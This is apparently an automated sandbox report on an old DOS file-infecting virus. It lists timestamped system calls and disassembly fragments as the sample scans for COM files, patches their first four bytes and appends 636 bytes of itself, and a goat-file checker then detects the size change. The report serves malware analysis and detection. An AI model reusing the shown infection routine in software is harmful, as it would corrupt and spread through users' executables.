Sample viewer

vx.netlux.org/Virus.DOS.Champaigne.636

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:41:58.727071856Z 42 PC: 140f4 | Get date 0x140f4: mov byte ptr ds:[bp + 0x336], dl
0x140f9: mov byte ptr ds:[bp + 0x335], dh
0x140fe: mov byte ptr ds:[bp + 0x334], al
0x14103: cmp al, 0
0x14105: je 0x14111
0x14107: mov di, 0x100
0x1410a: lea si, word ptr [bp + 0x29e]
0x1410e: push di
0x1410f: movsw word ptr es:[di], word ptr [si]
0x14110: movsw word ptr es:[di], word ptr [si]
0x14111: lea dx, word ptr [bp + 0x356]
0x14115: call 0x14229
0x14118: jmp 0x14214
0x1411b: cmp byte ptr ds:[bp + 0x336], 0x1b
0x14121: jne 0x1412e
0x14123: call 0x14155
0x14126: cmp byte ptr ds:[bp + 0x335], 6
0x1412c: je 0x1414c
0x1412e: mov dx, 0x80
0x14131: call 0x14229
2018-12-17T22:41:58.731143862Z 26 PC: 1422d | Set disk transfer address
2018-12-17T22:41:58.732403242Z 78 PC: 1421f | Find first file
2018-12-17T22:41:58.738468503Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:58.744372918Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.262991873Z 61 PC: 1417f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:41:59.269518521Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.271146904Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.278089608Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.279706693Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.281325034Z 64 PC: 1426e | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:41:59.284306682Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.285589334Z 44 PC: 141c5 | Get time 0x141c5: mov word ptr ds:[bp + 0x341], dx
0x141ca: mov cx, 0x12
0x141cd: lea di, word ptr [bp + 0x381]
0x141d1: lea si, word ptr [bp + 0x343]
0x141d5: push cx
0x141d6: push si
0x141d7: rep movsb byte ptr es:[di], byte ptr [si]
0x141d9: cmp byte ptr ds:[bp + 0x334], 0
0x141df: jne 0x141ed
0x141e1: mov cx, 0xd
0x141e4: lea si, word ptr [bp + 0x25d]
0x141e8: rep movsb byte ptr es:[di], byte ptr [si]
0x141ea: jmp 0x141f6
0x141ec: nop
0x141ed: mov cx, 0xb
0x141f0: lea si, word ptr [bp + 0x160]
0x141f4: rep movsb byte ptr es:[di], byte ptr [si]
0x141f6: pop si
0x141f7: pop cx
0x141f8: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T22:41:59.287916537Z 64 PC: 1437f | Write file or device (Write 636 bytes on handle 5)
2018-12-17T22:41:59.297292991Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.298581443Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.307172277Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.318568948Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.321010295Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.326641825Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.337333272Z 61 PC: 1417f | Open file (Filename = 'PRINT.COM')
2018-12-17T22:41:59.348220084Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.349590585Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.356940101Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.358407611Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.365508022Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.37579519Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.378330029Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.383647129Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.39351331Z 61 PC: 1417f | Open file (Filename = 'HELLO.COM')
2018-12-17T22:41:59.40460417Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.405928262Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.411982257Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.413588095Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.415125504Z 64 PC: 1426e | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:41:59.417941022Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.425762105Z 44 PC: 141c5 | Get time 0x141c5: mov word ptr ds:[bp + 0x341], dx
0x141ca: mov cx, 0x12
0x141cd: lea di, word ptr [bp + 0x381]
0x141d1: lea si, word ptr [bp + 0x343]
0x141d5: push cx
0x141d6: push si
0x141d7: rep movsb byte ptr es:[di], byte ptr [si]
0x141d9: cmp byte ptr ds:[bp + 0x334], 0
0x141df: jne 0x141ed
0x141e1: mov cx, 0xd
0x141e4: lea si, word ptr [bp + 0x25d]
0x141e8: rep movsb byte ptr es:[di], byte ptr [si]
0x141ea: jmp 0x141f6
0x141ec: nop
0x141ed: mov cx, 0xb
0x141f0: lea si, word ptr [bp + 0x160]
0x141f4: rep movsb byte ptr es:[di], byte ptr [si]
0x141f6: pop si
0x141f7: pop cx
0x141f8: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T22:41:59.428130133Z 64 PC: 1437f | Write file or device (Write 636 bytes on handle 5)
2018-12-17T22:41:59.436188969Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.438230129Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.445392968Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.454819809Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.457882745Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.463566056Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.469582836Z 61 PC: 1417f | Open file (Filename = 'PHANG.COM')
2018-12-17T22:41:59.483971653Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.485403668Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.49262692Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.494964761Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.502261361Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.508959006Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.511575119Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.515243743Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.521564187Z 61 PC: 1417f | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:41:59.530547927Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.531902657Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.537558378Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.540822708Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.549326489Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.561980385Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.56516052Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.571098284Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.579841504Z 61 PC: 1417f | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:41:59.584718917Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.585829293Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.590933829Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.592879561Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.594140639Z 64 PC: 1426e | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:41:59.596829019Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.599224141Z 44 PC: 141c5 | Get time 0x141c5: mov word ptr ds:[bp + 0x341], dx
0x141ca: mov cx, 0x12
0x141cd: lea di, word ptr [bp + 0x381]
0x141d1: lea si, word ptr [bp + 0x343]
0x141d5: push cx
0x141d6: push si
0x141d7: rep movsb byte ptr es:[di], byte ptr [si]
0x141d9: cmp byte ptr ds:[bp + 0x334], 0
0x141df: jne 0x141ed
0x141e1: mov cx, 0xd
0x141e4: lea si, word ptr [bp + 0x25d]
0x141e8: rep movsb byte ptr es:[di], byte ptr [si]
0x141ea: jmp 0x141f6
0x141ec: nop
0x141ed: mov cx, 0xb
0x141f0: lea si, word ptr [bp + 0x160]
0x141f4: rep movsb byte ptr es:[di], byte ptr [si]
0x141f6: pop si
0x141f7: pop cx
0x141f8: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T22:41:59.60173429Z 64 PC: 1437f | Write file or device (Write 636 bytes on handle 5)
2018-12-17T22:41:59.611069349Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.613207088Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.62143023Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.636666998Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.639935958Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.645379701Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.669849624Z 61 PC: 1417f | Open file (Filename = 'PAH.COM')
2018-12-17T22:41:59.678134855Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.679582279Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.685903745Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.687930436Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.69762307Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.707302058Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.710337592Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.715843866Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.725335848Z 61 PC: 1417f | Open file (Filename = 'TEST.COM')
2018-12-17T22:41:59.731647641Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.732847138Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.736949152Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.738829833Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.744706926Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.752244139Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.754635959Z 26 PC: 1422d | Set disk transfer address
2018-12-17T22:41:59.755630666Z 48 PC: 12a63 | Get DOS version
2018-12-17T22:41:59.756497352Z 9 PC: 12a7a | Display string (String= ' --=[ Selfchecking AntiStealth Goat COM/EXE file, 01/06/01 ]=------------------ (c) 1995-2001 by ROSE SWE, Dipl.-Ing. Ralph Roth - Version 1.18 - Freeware ')
2018-12-17T22:41:59.762188341Z 61 PC: 12cb7 | Open file (Filename = '')
2018-12-17T22:41:59.767592257Z 9 PC: 12a88 | Display string (String= 'Self test: ')
2018-12-17T22:41:59.769297765Z 93 PC: 12b24 | File sharing functions
2018-12-17T22:41:59.771281692Z 9 PC: 12b03 | Display string (String= 'Size change=+027Ch/00636d. Virus might be activ? ')
2018-12-17T22:41:59.774939977Z 76 PC: 12b09 | Terminate with return code (Return code = '1')